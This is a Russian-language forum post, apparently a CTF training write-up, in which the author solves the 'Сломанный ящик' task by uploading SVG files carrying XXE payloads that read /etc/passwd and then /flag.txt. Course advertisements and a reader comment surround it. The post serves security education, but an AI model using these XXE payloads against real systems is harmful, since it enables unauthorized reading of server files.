• 🚨 29 мая стартует курс «Пентест Active Directory: от теории к практике» от Академии Кодебай

    🔍 Изучите реальные техники атак на инфраструктуру Active Directory: от первоначального доступа до полной компрометации.
    🛠️ Освойте инструменты, такие как BloodHound, Mimikatz, CrackMapExec и другие.
    🧪 Пройдите практические лабораторные работы, имитирующие реальные сценарии атак.
    🧠 Получите знания, которые помогут вам стать востребованным специалистом в области информационной безопасности.

    После старта курса запись открыта еще 10 дней Подробнее о курсе ...

  • Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе

    «Анализ защищенности веб-приложений»

    🔥 Записаться бесплатно!

Writeup XXE-уязвимость в CTF: разбор задания «Сломанный ящик»

Kot_oo

One Level
03.04.2025
6
11
Добрый день коллеги, штурмуем задания из учебы, на этот раз "Сломанный ящик"

1.webp


Залетаем в задание и осматриваемся в нашем любимом burp
2.webp


Все как и положено включаем intercept, и штудируем запрос

Видим adoba и понимаем, что нам с ним работать.
Так же видим, что у нас используется кодировка URL в правом окне

3.webp


Честно скажу просидел достаточно долго раздумывая, никак не получалось XML заставить отработать,
P.S> мы ж легких путей не ищем
, но вспомнив про нагрузку в картинке из урока пошел за ней))
Достаем от туда код

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]>
<svg width="128px" height="128px" xmlns=" " xmlns:xlink=" " version="1.1">
<text font-size="16" x="0" y="16">&xxe;</text>
</svg>

И пробуем подкинуть в burp с одинарной кодировкой и вуаля мы получаем passwd, далее меняем код (расширяем значение картинки и берем место положения "/flag.txt" из задания и получаем >

(ЗАБЕГАЯ ВПЕРЕД по случаю "мы ж легких путей не ищем"!!!! ДАННЫЙ КОД РАБОТАЕТ ПРОСТО ЕСЛИ ЕГО ВСТАВИТЬ В ФОРМУ!!!!!!! НА СТРАНИЦЕ)

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "/flag.txt" > ]>
<svg width="1000px" height="1000px" xmlns=" " xmlns:xlink=" " version="1.1">
<text font-size="16" x="0" y="16">&xxe;</text>
</svg>

Вот и получаем флаг. Оказалось все намного проще, чем мог себе представить. (от использования двойной кодировки, change requests method (кстати возьмите на заметку, если в запросе xml не прослеживается) и заканчивая expect :D)
4.webp


Сильно не ругайте, критика принимается)

И коллеги помните!!!! «Не стыдно не знать, стыдно не учиться» — русская пословица.
 
Последнее редактирование:
Всё круто, но зачем было айпи замазывать?))) а так хороший и понятный райтап
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Курс AD